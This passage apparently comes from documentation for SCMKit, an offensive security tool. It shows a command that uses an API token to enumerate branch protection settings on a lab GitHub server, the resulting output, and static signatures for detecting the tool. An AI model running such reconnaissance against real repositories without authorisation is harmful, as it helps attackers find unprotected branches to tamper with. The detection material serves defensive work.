SCMKit.exe -s github -m protection -c apikey -u https://github.something.local -o reponame
C:\>.\SCMKit.exe -u http://github.hogwarts.local -s github -c apiToken -m protection -o public-r
==================================================
Module: protection
System: github
Auth Type: API Key
Options: public-r
Target URL: http://github.hogwarts.local
Timestamp: 8/29/2022 2:02:42 PM
==================================================
Repo | Branch | Protection
----------------------------------------------------------------------------------------------------------
public-repo | dev | Protected: True
Status checks must pass before merge:
Branch must be up-to-date before merge: True
Owner review required before merge: True
Approvals required before merge: 2
Protections apply to repo admins: True
public-repo | main | Protected: False
Below are static signatures for the specific usage of this tool in its default state:
{266C644A-69B1-426B-A47C-1CF32B211F80}
SCMKIT-5dc493ada400c79dd318abbe770dac7c
SCMKIT-
for the name.For detection guidance of the techniques used by the tool, see the X-Force Red blog post.